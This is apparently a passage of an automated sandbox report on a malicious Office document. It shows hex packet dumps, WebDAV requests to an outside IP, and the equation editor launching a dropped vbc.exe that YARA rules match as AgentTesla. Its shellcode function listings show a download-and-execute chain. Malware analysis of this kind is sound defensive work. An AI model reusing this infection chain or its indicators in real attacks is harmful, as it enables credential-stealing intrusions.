Aug 5, 2022 16:36:14.950305939 CEST	44	IN	Data Raw: 00 0a 02 7b 21 00 00 04 6f 4c 00 00 0a 00 02 28 4b 00 00 0a 02 7b 20 00 00 04 6f 4c 00 00 0a 00 02 28 4b 00 00 0a 02 7b 1f 00 00 04 6f 4c 00 00 0a 00 02 28 4b 00 00 0a 02 7b 1e 00 00 04 6f 4c 00 00 0a 00 02 28 4b 00 00 0a 02 7b 1d 00 00 04 6f 4c Data Ascii: {!oL(K{ oL(K{oL(K{oL(K{oL(K{oLrp(Arpof(N(l*0~srpotss \s o
Aug 5, 2022 16:36:14.950320959 CEST	45	IN	Data Raw: 20 db 8e fb 0e 13 12 2b 1d 11 12 20 e0 8e fb 0e fe 02 16 fe 01 13 45 11 45 2c 08 11 12 17 58 13 12 2b 03 17 13 12 20 e1 8e fb 0e 13 13 11 13 20 00 8f fb 0e fe 02 13 46 11 46 2c 09 20 c3 8e fb 0e 13 13 2b 1d 11 13 20 f7 8e fb 0e fe 02 16 fe 01 13 Data Ascii: + EE,X+ FF, + GG,X+ HH, + II,X+ JJ, + KK,X+ LL,
Aug 5, 2022 16:36:14.950335979 CEST	47	IN	Data Raw: 0a 00 2b 00 06 72 85 02 00 70 6f a2 00 00 0a 00 2b 00 06 72 87 05 00 70 6f a2 00 00 0a 00 2b 02 2b 00 06 13 04 2b 00 11 04 2a 00 13 30 01 00 0c 00 00 00 13 00 00 11 00 02 7b 29 00 00 04 0a 2b 00 06 2a 13 30 04 00 81 03 00 00 00 00 00 00 02 73 a3 Data Ascii: +rpo+rpo+++0{)+0s})(m{)sJ%o9%rpo;%rpo=%o?%oC%doA%rpoI%oG% oEo{)sJ%o9%rpo;%rpo
Aug 5, 2022 16:36:14.950351954 CEST	48	IN	Data Raw: 11 00 28 a9 00 00 0a d0 05 00 00 01 28 97 00 00 0a 16 6f aa 00 00 0a 0a 06 8e 16 fe 03 0b 07 2c 2a 00 06 16 9a 74 05 00 00 01 0c 08 6f ab 00 00 0a 72 ef 00 00 70 28 ac 00 00 0a 0d 09 2c 0b 00 08 6f ab 00 00 0a 13 04 2b 14 00 28 a9 00 00 0a 6f ad Data Ascii: ((o,torp(,o+(o(+0(ooo+0;((o,rp+to+0;((o
Aug 5, 2022 16:36:14.950366974 CEST	50	IN	Data Raw: 0a 6f 40 00 00 0a 00 02 7b 37 00 00 04 1c 16 19 16 73 c3 00 00 0a 6f c4 00 00 0a 00 02 7b 37 00 00 04 16 1f 11 73 45 00 00 0a 6f c5 00 00 0a 00 02 7b 37 00 00 04 72 b5 07 00 70 6f 41 00 00 0a 00 02 7b 37 00 00 04 20 0f 01 00 00 1f 11 73 45 00 00 Data Ascii: o@{7so{7sEo{7rpoA{7 sEoF{7oG{7rpof{7o{8o{8 4s?o@{8so{8sEo{8rpoA{8 sE
Aug 5, 2022 16:36:15.064938068 CEST	51	IN	Data Raw: fe 03 2b 01 16 0a 06 2c 0e 00 02 7b 3c 00 00 04 6f 23 00 00 0a 00 00 02 03 28 df 00 00 0a 00 2a 36 00 02 73 70 00 00 0a 7d 3c 00 00 04 2a 5e 02 14 7d 3d 00 00 04 02 28 dc 00 00 0a 00 00 02 28 5d 00 00 06 00 2a 7e 02 14 7d 3d 00 00 04 02 28 dc 00 Data Ascii: +,{<o#(6sp}<^}=((]~}=(o(]0o,repsz0+,{=+,{=o#(6sp}=^}>((b~}>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.22	49176	198.23.207.54	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Aug 5, 2022 16:36:19.806248903 CEST	926	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 198.23.207.54
Aug 5, 2022 16:36:19.923563004 CEST	926	IN	HTTP/1.1 302 Found Date: Fri, 05 Aug 2022 14:36:19 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 X-Powered-By: PHP/8.1.6 Location: http://198.23.207.54/dashboard/ Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Aug 5, 2022 16:36:19.923986912 CEST	927	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 64 61 73 68 62 6f 61 72 64 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 Data Ascii: PROPFIND /dashboard/ HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 198.23.207.54
Aug 5, 2022 16:36:20.044523001 CEST	927	IN	HTTP/1.1 405 Method Not Allowed Date: Fri, 05 Aug 2022 14:36:19 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 Allow: GET,POST,OPTIONS,HEAD,TRACE Content-Length: 328 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 33 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6e 20 50 48 50 2f 38 2e 31 2e 36 20 53 65 72 76 65 72 20 61 74 20 31 39 38 2e 32 33 2e 32 30 37 2e 35 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 Server at 198.23.207.54 Port 80</address></body></html>
Aug 5, 2022 16:36:20.352402925 CEST	928	IN	HTTP/1.1 405 Method Not Allowed Date: Fri, 05 Aug 2022 14:36:19 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 Allow: GET,POST,OPTIONS,HEAD,TRACE Content-Length: 328 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 33 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6e 20 50 48 50 2f 38 2e 31 2e 36 20 53 65 72 76 65 72 20 61 74 20 31 39 38 2e 32 33 2e 32 30 37 2e 35 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 Server at 198.23.207.54 Port 80</address></body></html>
Aug 5, 2022 16:36:21.139225006 CEST	928	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 198.23.207.54
Aug 5, 2022 16:36:21.255945921 CEST	929	IN	HTTP/1.1 302 Found Date: Fri, 05 Aug 2022 14:36:21 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 X-Powered-By: PHP/8.1.6 Location: http://198.23.207.54/dashboard/ Content-Length: 0 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Aug 5, 2022 16:36:21.256493092 CEST	929	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 64 61 73 68 62 6f 61 72 64 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 Data Ascii: PROPFIND /dashboard/ HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 198.23.207.54
Aug 5, 2022 16:36:21.375402927 CEST	929	IN	HTTP/1.1 405 Method Not Allowed Date: Fri, 05 Aug 2022 14:36:21 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 Allow: GET,POST,OPTIONS,HEAD,TRACE Content-Length: 328 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 33 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6e 20 50 48 50 2f 38 2e 31 2e 36 20 53 65 72 76 65 72 20 61 74 20 31 39 38 2e 32 33 2e 32 30 37 2e 35 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 Server at 198.23.207.54 Port 80</address></body></html>
Aug 5, 2022 16:36:21.680614948 CEST	930	IN	HTTP/1.1 405 Method Not Allowed Date: Fri, 05 Aug 2022 14:36:21 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 Allow: GET,POST,OPTIONS,HEAD,TRACE Content-Length: 328 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 33 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6e 20 50 48 50 2f 38 2e 31 2e 36 20 53 65 72 76 65 72 20 61 74 20 31 39 38 2e 32 33 2e 32 30 37 2e 35 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 Server at 198.23.207.54 Port 80</address></body></html>

Target ID:	0
Start time:	16:36:12
Start date:	05/08/2022
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13ffe0000
File size:	1423704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	9
Start time:	16:36:32
Start date:	05/08/2022
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	10
Start time:	16:36:35
Start date:	05/08/2022
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\vbc.exe"
Imagebase:	0x3a0000
File size:	839680 bytes
MD5 hash:	DD7507C4B13050E9A433A7BD70F7591F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000A.00000002.967107263.0000000002446000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000A.00000002.966356766.00000000021F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.967422759.00000000032AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000A.00000002.967422759.00000000032AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 0000000A.00000002.967422759.00000000032AE000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 31%, Metadefender, Browse Detection: 92%, ReversingLabs
Reputation:	low

Show Windows behavior

Target ID:	13
Start time:	16:36:41
Start date:	05/08/2022
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Public\vbc.exe
Imagebase:	0x3a0000
File size:	839680 bytes
MD5 hash:	DD7507C4B13050E9A433A7BD70F7591F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Target ID:	14
Start time:	16:36:42
Start date:	05/08/2022
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Public\vbc.exe
Imagebase:	0x3a0000
File size:	839680 bytes
MD5 hash:	DD7507C4B13050E9A433A7BD70F7591F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Target ID:	15
Start time:	16:36:43
Start date:	05/08/2022
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Public\vbc.exe
Imagebase:	0x3a0000
File size:	839680 bytes
MD5 hash:	DD7507C4B13050E9A433A7BD70F7591F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Target ID:	16
Start time:	16:36:44
Start date:	05/08/2022
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Public\vbc.exe
Imagebase:	0x3a0000
File size:	839680 bytes
MD5 hash:	DD7507C4B13050E9A433A7BD70F7591F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Target ID:	17
Start time:	16:36:45
Start date:	05/08/2022
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Public\vbc.exe
Imagebase:	0x3a0000
File size:	839680 bytes
MD5 hash:	DD7507C4B13050E9A433A7BD70F7591F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Target ID:	18
Start time:	16:36:56
Start date:	05/08/2022
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding
Imagebase:	0x13fd70000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	19
Start time:	16:36:57
Start date:	05/08/2022
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding
Imagebase:	0x13fd70000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Execution Graph

Execution Coverage:	47.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	90%
Total number of Nodes:	40
Total number of Limit Nodes:	3

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 03640666 Relevance: 4.6, APIs: 3, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.942263460.0000000003640000.00000004.00000800.00020000.00000000.sdmp, Offset: 03640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_3640000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID:
API String ID: 3584569557-0
Opcode ID: b2bf9fdd4b06137e50c49802b50f4aa4c124a8f69da8cca216617606219ff45d
Instruction ID: e9f9fdd8b3e8b1387bb43d7e6e3af50df558e32c545ee1eef348e7a75447b0e2
Opcode Fuzzy Hash: b2bf9fdd4b06137e50c49802b50f4aa4c124a8f69da8cca216617606219ff45d
Instruction Fuzzy Hash: 872113A2D4C3D12EDB13A7700C6DB56BF646F63204F5949CEE2C24A4E3E6A89400CB67

Uniqueness

Uniqueness Score: -1.00%

Function 036406B9 Relevance: 4.5, APIs: 3, Instructions: 37
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,03640677,?,00000000,00000000), ref: 036406BB

Part of subcall function 036406D2: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 036406F9
Part of subcall function 036406D2: ExitProcess.KERNEL32(00000000,?,03640700), ref: 03640711

Memory Dump Source

Source File: 00000009.00000002.942263460.0000000003640000.00000004.00000800.00020000.00000000.sdmp, Offset: 03640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_3640000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID:
API String ID: 3584569557-0
Opcode ID: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
Instruction ID: 213a81043f9ed9c40ff9ee61cdfd17681de0426545dc499565ce68abcac00e29
Opcode Fuzzy Hash: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
Instruction Fuzzy Hash: 0FF02760E5D35039EB11F3740E9EF6BEF14AF92700F140889F3424D4D3D89488008A1F

Uniqueness

Uniqueness Score: -1.00%

Function 036406E7 Relevance: 3.0, APIs: 2, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 036406F9

Part of subcall function 0364070C: ExitProcess.KERNEL32(00000000,?,03640700), ref: 03640711

Memory Dump Source

Source File: 00000009.00000002.942263460.0000000003640000.00000004.00000800.00020000.00000000.sdmp, Offset: 03640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_3640000_EQNEDT32.jbxd

Similarity

API ID: ExecuteExitProcessShell
String ID:
API String ID: 1124553745-0
Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
Instruction ID: 86a8f665d29ac7e9edbcbdeb5cf9662bac9456f49fa4a809f8631630331d1fe3
Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
Instruction Fuzzy Hash: 62012659E5837221DB30F2384F8DBF7EB51EB42750FCC8946AB9009589D158A0C38E1B

Uniqueness

Uniqueness Score: -1.00%

Function 036406D2 Relevance: 3.0, APIs: 2, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.942263460.0000000003640000.00000004.00000800.00020000.00000000.sdmp, Offset: 03640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_3640000_EQNEDT32.jbxd

Similarity

API ID: ExecuteExitProcessShell
String ID:
API String ID: 1124553745-0
Opcode ID: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
Instruction ID: dace126a32d9eec6e5a51c7f8b4a911cbd4a908962b30620321ad7bc250cf0c5
Opcode Fuzzy Hash: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
Instruction Fuzzy Hash: C2014924E5832131E760F3344FCCBABEE85EB82754F98895AE39109489C24858438E1F

Uniqueness

Uniqueness Score: -1.00%

Function 0364064C Relevance: 1.5, APIs: 1, Instructions: 16
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32 ref: 0364064C

Part of subcall function 03640666: URLDownloadToFileW.URLMON(00000000,03640677,?,00000000,00000000), ref: 036406BB
Part of subcall function 03640666: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 036406F9
Part of subcall function 03640666: ExitProcess.KERNEL32(00000000,?,03640700), ref: 03640711

Memory Dump Source

Source File: 00000009.00000002.942263460.0000000003640000.00000004.00000800.00020000.00000000.sdmp, Offset: 03640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_3640000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileLibraryLoadProcessShell
String ID:
API String ID: 2508257586-0
Opcode ID: 5cbdd8588b88a8ef21b04b99ed6b514f4a6dad177a7af232f422f84f71528838
Instruction ID: ae430d5e44336d394958f26d2c61647b1c7df9f56f4fdb53a8d418145c4e51ca
Opcode Fuzzy Hash: 5cbdd8588b88a8ef21b04b99ed6b514f4a6dad177a7af232f422f84f71528838
Instruction Fuzzy Hash: 77C08CA0412A1936AB24F5502F339AFBA0CF28355E3056004A942003230500232A44EE

Uniqueness

Uniqueness Score: -1.00%

Function 0364070C Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000,?,03640700), ref: 03640711

Memory Dump Source

Source File: 00000009.00000002.942263460.0000000003640000.00000004.00000800.00020000.00000000.sdmp, Offset: 03640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_3640000_EQNEDT32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 03640713 Relevance: .0, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.942263460.0000000003640000.00000004.00000800.00020000.00000000.sdmp, Offset: 03640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_3640000_EQNEDT32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction ID: 171e1ca7dfce5eb11c4bdb86d42dd2c190273dfd20b8740b7d3f53b9e8a01876
Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction Fuzzy Hash: A6D052352025028FE304DF04CA84E52F3AAFFD8350B28C268E6004BB19C330E892CA94

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vbc.exePID: 2192, Parent PID: 2440COMMON

Execution Graph

Execution Coverage:	16.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	18
Total number of Limit Nodes:	0

Executed Functions

Function 00380F32 Relevance: 1.1, Instructions: 1147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.965725439.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
